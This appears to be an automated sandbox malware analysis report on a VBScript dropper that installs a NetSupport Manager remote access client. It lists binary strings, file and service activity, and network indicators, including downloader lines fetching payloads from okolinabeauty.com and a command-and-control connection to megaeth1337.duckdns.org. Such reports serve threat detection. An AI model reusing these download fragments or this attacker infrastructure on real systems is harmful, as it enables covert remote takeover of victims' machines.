                                Source: Binary string: tapi32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wrpcrt4.pdbx source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wntdll.pdbb source: client32.exe, 00000026.00000003.2696801013.000000000769D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695230084.0000000007690000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695127199.000000000768A000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2694988541.0000000007684000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695369068.000000000769B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2695300634.0000000007696000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: npciinv.pdbd source: client32.exe, 00000026.00000002.2711304363.0000000007236000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: shlwapi.pdb8 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mfc100u.i386.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2713338524.0000000069A41000.00000020.00000001.01000000.00000025.sdmp, client32.exe, 00000028.00000002.2766685456.000000006B361000.00000020.00000001.01000000.00000025.sdmp
                                Source: Binary string: wwin32u.pdbb source: client32.exe, 00000026.00000003.2695492759.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2696342862.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: shcore.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: riched20.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\pciinv.pdb G source: client32.exe, 00000026.00000002.2707997858.0000000004E71000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: oleaut32.pdb3 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: sechost.pdb9 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wgdi32.pdb source: client32.exe, 00000026.00000003.2695492759.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2696342862.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Amsi.pdb5 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000026.00000002.2707997858.0000000004E71000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdbpOD source: MSI2BE4.tmp, 0000001E.00000000.2548654979.00000000004D9000.00000002.00000001.01000000.0000000C.sdmp, MSI2BE4.tmp, 0000001E.00000002.2554229748.00000000004D9000.00000002.00000001.01000000.0000000C.sdmp
                                Source: Binary string: cryptsp.pdbZ$ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: dnsapi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: userenv.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wimm32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wwin32u.pdb source: client32.exe, 00000026.00000003.2695492759.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2696342862.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: setupapi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wgdi32.pdbb source: client32.exe, 00000026.00000003.2695492759.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2696342862.00000000076B1000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: winhttp.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: dxdiagn.pdbn$ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: devobj.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: gdiplus.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: rtutils.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: profapi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: dhcpcsvc6.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: opciinvclient32.pdbwkernel32.pdb\Program Files (x86)\NetSupport\NetSupport Manager\Support ManagerD source: client32.exe, 00000026.00000002.2711304363.0000000007236000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: |E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdbpdblient32.pdb@ source: client32.exe, 00000026.00000002.2711304363.0000000007236000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: WLDP.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\System32\wkernel32.pdbG source: client32.exe, 00000026.00000003.2700723405.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.00000000009BD000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Pyyidau.vbs.exe, 00000003.00000002.1836537031.0000000008360000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: setupapi.pdb5 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: msxml6.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: version.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\nt\Release_unicode\Winst32.pdbp source: MSI264F.tmp, 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp, MSI264F.tmp, 0000001C.00000000.2534398483.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp, MSI51C1.tmp, 00000022.00000002.2658247472.0000000000DC9000.00000002.00000001.01000000.00000013.sdmp, MSI51C1.tmp, 00000022.00000000.2645382897.0000000000DC9000.00000002.00000001.01000000.00000013.sdmp
                                Source: Binary string: dbgcore.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: riched32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\exe\client32.pdb source: client32.exe, 00000026.00000003.2701254562.0000000000925000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2702974636.0000000000925000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wintrust.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: ws2_32.pdb/ source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Windows\System32\wkernel32.pdb2 source: client32.exe, 00000026.00000003.2700723405.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.00000000009BD000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: Kernel.Appcore.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb( source: client32.exe, 00000026.00000003.2701499634.0000000004EEA000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: psapi.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wkernelbase.pdb( source: client32.exe, 00000026.00000002.2707856987.0000000004E62000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000003.2700024684.0000000004E62000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: \??\C:\Program Files (x86)\NetSupport\NetSupport Manager\symbols\dll\wkernelbase.pdb1} source: client32.exe, 00000026.00000003.2700723405.00000000009BD000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000026.00000002.2703111799.00000000009BD000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wtsapi32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wmiclnt.pdb3 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: oleaut32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: mfc100u.i386.pdb8 source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: comctl32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: crypt32.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: wbemprox.pdb source: client32.exe, 00000026.00000003.2696342862.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: z:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: x:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: v:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: t:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: r:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: p:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: n:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: l:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: j:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: h:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: f:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: d:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: b:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: y:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: w:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: u:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: s:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: q:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: o:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: m:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: k:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: i:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: g:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: e:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: c:
                                Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exeFile opened: a:
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B280C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle,28_2_00B280C0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B24AF0 GetSystemDirectoryW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,GetModuleFileNameW,FindFirstFileW,FindClose,CopyFileW,28_2_00B24AF0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B10C40 FindFirstFileW,__wcsicoll,FindNextFileW,FindClose,FindFirstFileW,FindFirstFileW,__wcsicoll,FindNextFileW,FindNextFileW,FindClose,28_2_00B10C40
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B255D0 _memset,FindFirstFileW,FindClose,28_2_00B255D0
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B0FD80 FindFirstFileW,CompareFileTime,FindClose,__wcsicoll,CreateDirectoryW,MoveFileW,GetLastError,CopyFileW,MoveFileW,GetLastError,28_2_00B0FD80
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B0FE18 FindFirstFileW,CompareFileTime,FindClose,__wcsicoll,CreateDirectoryW,MoveFileW,28_2_00B0FE18
                                Source: C:\Windows\Installer\MSI264F.tmpCode function: 28_2_00B2BE60 wsprintfW,GetPrivateProfileIntW,LoadStringW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetSystemDirectoryW,28_2_00B2BE60
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004980C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle,30_2_004980C0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_00494AF0 GetSystemDirectoryW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,GetModuleFileNameW,FindFirstFileW,FindClose,CopyFileW,30_2_00494AF0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_00480C40 FindFirstFileW,__wcsicoll,FindNextFileW,FindClose,FindFirstFileW,FindFirstFileW,__wcsicoll,FindNextFileW,FindNextFileW,FindClose,30_2_00480C40
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_004955D0 _memset,FindFirstFileW,FindClose,30_2_004955D0
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0047FD80 FindFirstFileW,CompareFileTime,FindClose,__wcsicoll,CreateDirectoryW,MoveFileW,GetLastError,CopyFileW,MoveFileW,GetLastError,30_2_0047FD80
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0049BE60 wsprintfW,GetPrivateProfileIntW,LoadStringW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetSystemDirectoryW,30_2_0049BE60
                                Source: C:\Windows\Installer\MSI2BE4.tmpCode function: 30_2_0047FE18 FindFirstFileW,CompareFileTime,FindClose,__wcsicoll,CreateDirectoryW,MoveFileW,30_2_0047FE18
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001A0C40 _wcsrchr,FindFirstFileW,__wcsicoll,FindNextFileW,FindClose,FindFirstFileW,FindFirstFileW,__wcsicoll,FindNextFileW,FindNextFileW,FindClose,32_2_001A0C40
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001B80C0 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,ControlService,GetLastError,GetLastError,GetLastError,QueryServiceStatus,QueryServiceStatus,Sleep,Sleep,QueryServiceStatus,wsprintfW,wsprintfW,GetComputerNameW,GetCurrentDirectoryW,wsprintfW,FindFirstFileW,GetCurrentDirectoryW,DeleteFileW,FindNextFileW,FindClose,GetCurrentDirectoryW,RemoveDirectoryW,DeleteService,GetLastError,CloseServiceHandle,OpenServiceW,GetLastError,QueryServiceConfigW,ChangeServiceConfigW,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,OpenSCManagerW,GetLastError,CloseServiceHandle,32_2_001B80C0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001B4AF0 GetSystemDirectoryW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,GetModuleFileNameW,_wcsrchr,FindFirstFileW,FindClose,_wcsrchr,CopyFileW,32_2_001B4AF0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001B55D0 _memset,FindFirstFileW,FindClose,_wcsrchr,32_2_001B55D0
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_0019FD80 FindFirstFileW,CompareFileTime,FindClose,_wcsrchr,__wcsicoll,CreateDirectoryW,MoveFileW,GetLastError,CopyFileW,MoveFileW,GetLastError,32_2_0019FD80
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_0019FE18 FindFirstFileW,CompareFileTime,FindClose,_wcsrchr,__wcsicoll,CreateDirectoryW,MoveFileW,32_2_0019FE18
                                Source: C:\Windows\Installer\MSI3FCC.tmpCode function: 32_2_001BBE60 wsprintfW,GetPrivateProfileIntW,LoadStringW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,GetSystemDirectoryW,32_2_001BBE60
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData

                                Software Vulnerabilities

                                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                                Networking

                                Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 176.126.113.166 443
                                Source: C:\Windows\Installer\MSI3FCC.tmpRegistry value created: NULL Service
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeDropped file: binaryStream.Write xmlHttp.responseBody
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeDropped file: binaryStream.SaveToFile nsmFile, 2
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeDropped file: binaryStream.Write xmlHttp.responseBody
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeDropped file: binaryStream.SaveToFile clientFile, 2
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeDropped file: binaryStream.Write xmlHttp.responseBody
                                Source: C:\Users\user\Desktop\Pyyidau.vbs.exeDropped file: binaryStream.SaveToFile targetFile, 2
                                Source: unknownDNS query: name: megaeth1337.duckdns.org
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 1773
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1773 -> 49832
                                Source: global trafficTCP traffic: 192.168.2.4:49832 -> 185.170.144.66:1773
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 104.26.0.231 104.26.0.231
                                Source: Joe Sandbox ViewASN Name: SAARGATE-ASVSENETGmbHDE SAARGATE-ASVSENETGmbHDE
                                Source: Joe Sandbox ViewASN Name: VDWELLEREE VDWELLEREE
                                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: global trafficHTTP traffic detected: GET /choh/NSM.lic HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: okolinabeauty.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /choh/Client32.ini HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: okolinabeauty.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /choh/vrep.msi HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: okolinabeauty.comConnection: Keep-Alive
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Connection: Upgrade Upgrade: websocket User-Agent: NetSupport Manager/1.3 Sec-WebSocket-Key: 9Bnq7QJqg8kCGoqK+ufHdg== Sec-WebSocket-Version: 13 Host: megaeth1337.duckdns.org:1773
                                Source: global traffic | DNS traffic detected: DNS query: okolinabeauty.com
                                Source: global traffic | DNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: global traffic | DNS traffic detected: DNS query: megaeth1337.duckdns.org
                                Source: client32.exe, 00000026.00000002.2713338524.0000000069A41000.00000020.00000001.01000000.00000025.sdmp, client32.exe, 00000028.00000002.2766685456.000000006B361000.00000020.00000001.01000000.00000025.sdmp | String found in binary or memory: ftp://http://HTTP/1.0
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmp | String found in binary or memory: http://%s/favicon.icoshcore.dllGetDpiForMonitorPCI
                                Source: client32.exe, 00000026.00000002.2715380092.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000028.00000002.2767435656.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, PCICL32.DLL.22.dr | String found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: pcicfgui_client.exe, 00000024.00000002.2676926399.000000006B852000.00000002.00000001.01000000.0000001F.sdmp | String found in binary or memory: http://62.172.138.12/url_redirect.htm#The
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1831932926.00000000070CD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmp | String found in binary or memory: http://geo.netsupportsoftware.com/location/latlong.asp?lat=%s&lng=%s&lang=%sGet
                                Source: client32.exe, 00000026.00000002.2715380092.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, client32.exe, 00000028.00000002.2767435656.000000006BDC6000.00000002.00000001.01000000.00000015.sdmp, PCICL32.DLL.22.dr | String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspLatLongclose
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmp | String found in binary or memory: http://localhost/ApprovedWebList.htmPrintSurveyInternet6
                                Source: pcicfgui_client.exe, 00000024.00000002.2676144643.000000006A868000.00000002.00000001.01000000.0000001F.sdmp | String found in binary or memory: http://localhost/weblock.htmForcePowerOffConfirmationDisablePrintSurveyAnswerCountStudentVolumeLockS
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825939447.0000000005808000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825322765.00000000048F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                                Source: client32.exe, 00000028.00000002.2766139877.0000000007E24000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.microsoN
                                Source: Pyyidau.vbs.exe, 00000003.00000002.1825322765.00000000047A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: wscript.exe, 00000005.00000003.2439151550.0000000008DEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2453934056.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456677584.0000000005E76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2454210130.000000000B614000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455908830.0000000002EC2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2478190816.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002EB2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482295456.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2475499274.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2476255642.000000000DF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, MSI3FCC.tmp, 00000020.00000003.2616274050.0000000000B85000.00000004.00000020.00020000.00000000.sdmp, winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmp, pcicfgui_client.exe, 00000024.00000002.2673615139.0000000003136000.00000002.00000001.00040000.00000022.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                                Source: winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crl0f
                                Source: winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crt0
                                Source: winst64.exe, 00000021.00000002.2615349349.0000000000B38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sf.symcd.com0&
                                Source: wscript.exe, 00000005.00000003.2482401323.00000000060B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008EEE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2464932599.0000000005ECB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2456340850.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2458849182.0000000002E24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2455334046.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2482401323.000000000611C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E6D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.2439151550.0000000008E3F000.00000004.00000020.00020000.00000000.sdmp, MSI211F.tmp.22.drString found in binary or memory: http://sv.symcb.com/sv.crl0f
